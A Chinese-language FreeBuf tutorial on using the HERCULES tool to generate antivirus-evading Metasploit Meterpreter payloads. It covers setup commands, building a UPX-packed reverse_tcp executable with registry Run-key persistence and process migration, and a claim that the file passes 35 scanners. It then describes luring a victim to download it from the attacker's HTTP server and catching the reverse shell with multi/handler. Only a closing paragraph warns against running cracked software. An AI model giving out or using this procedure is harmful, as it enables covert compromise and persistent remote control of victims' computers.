如何用HERCULES繞過殺軟

*本文原創作者：noosec，本文屬FreeBuf原創獎勵計劃，未經許可禁止轉載

HERCULES

是一個由Go語言開發的可以繞過防病毒軟體的可定製的有效載荷生成器，只需簡單的設置，就可以生成用於Metasploit的免殺payload，經測試，可完美繞過當前主流防病毒軟體查殺檢測。

Let us learn how to use it !

測試環境：

kali linux 2.0 : 192.168.1.100

windows7 x64 : 192.168.1.140

測試流程：

1.下載配置go語言環境；

2.下載初始化HERCULES ；

3.生成免殺exp；

4.誘使受害者下載執行exp

5.Metasploit監聽並獲取許可權

（一）

下載配置go語言環境

：

在kali linux 攻擊機中安裝go 語言環境。

1.下載源碼包：

wget

-c https:

//storage.googleapis.com/golang/go1.8.3.linux-amd64.tar.gz

2.解壓文件至/usr/local

tar

-C /usr/

local

-xzf go1.

8.3

.linux-amd64.tar.gz

3.設置環境變數（讓命令go有效）

cd

~

vim

.profile

在文件未必追加：

export

PATH=$PATH

:/usr/local/go/bin

保存退出

使當前配置文件生效

.

.profile

4.測試：

go

version

（二）

下載初始化HERCULES

：

從github上下載HERCULES源文件：

git

clone

https:

//github.com/noosec/HERCULES.git

下載HERCULES相關的資源文件

wget -c https:

//github.com/fatih/color

初始化HERCULES

go

get

github.com/fatih/color

go run Setup.go

（三）生成免殺payload

1.選擇生成Payload：

運行當前目錄下HERCULES，選擇第一個選項：

2.選擇Tcp類型的 Meterpreter Payload

#WHAT IS UPX ?

UPX（Ultimate Packer for Executables）是一款免費的開源可執行封裝程序，支持來自不同操作系統的多種文件格式。 UPX簡單地將二進位文件壓縮，在運行時將二進位打包（解壓縮）本身打包到內存中。

#WHAT IS

"AV EVASION SCORE"

?

AV Evasion Score是確定有效載荷反病毒繞過能力有效性的一個比例尺（1/10），1代表通過AV軟體的可能性很低。

使用特殊功能並用upx打包有效載荷可減少AV Evasion Score

選擇Tcp 類型的 Payload ,輸入 1，回車

3.進入payload參數設置界面：

輸入反彈回連的IP地址，埠號：

#Persistence:

持久性功能將運行的二進位文件添加到windows啟動註冊表（CurrentVersion / Run ） 以進行持續訪問。

#Migration:

此函數觸發一個循環，嘗試遷移到遠程進程，直到成功遷移為止

以下設置可根據自已需要設置，這裡我選擇了使用持久性功能，增加了 by pass av 相關函數功能payload 並使用了 upx 加殼，生成了文件名為creak.exe的payload反彈exe程序。

經過以上設置，回車之後，會在當前用戶主目錄下生成相關免殺exe程序：

對於相關程序是否免殺，我們可以通過在線av查殺網站進行測試，通過35個查殺軟體掃描，全部掃描的結果為clean：

國內某殺軟體 ：

（四）Win7下載生成的exe

在Kali Linux 中 exe文件所在目錄執行，將當前目錄文件共享：

python

-m SimpleHTTPServer

win7 中使用瀏覽器訪問：http://192.168.1.100/creak.exe，下載文件到本地

。

（五）Metasploit監聽並獲取許可權

使用msf，載入以下兩個模塊，設置相關參數，並等待連接：

exploit

/multi/

handler

windows

/meterpreter/

reverse_tcp

在win7上運行creak.exe，msf 成功收到反彈shell。

END ：

在測試過程中，當運行生成的Payload之後，殺毒軟體可能會基於行為分析，將生成的payload識別為木馬程序，當遇到這種情況後，只需使用HERCULES重新生成一次，就可 by pass this AV 了。

在國內，各種軟體下載網站，

各種破解程序

多不勝數，這些軟體都有一個共性，在運行的時候，建議關閉殺毒軟體，亦或是建議先使用殺毒軟體進行一次雲查殺，再告訴用戶，此軟體是乾淨、無毒的，建立關閉殺毒軟體，再運行相關程序文件，但結果可能是，你運行了一個木馬程序。

*本文原創作者：noosec，本文屬FreeBuf原創獎勵計劃，未經許可禁止轉載

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！

本站內容充實豐富，博大精深，小編精選每日熱門資訊，隨時更新，點擊「搶先收到最新資訊」瀏覽吧！

請您繼續閱讀更多來自 FreeBuf 的精彩文章: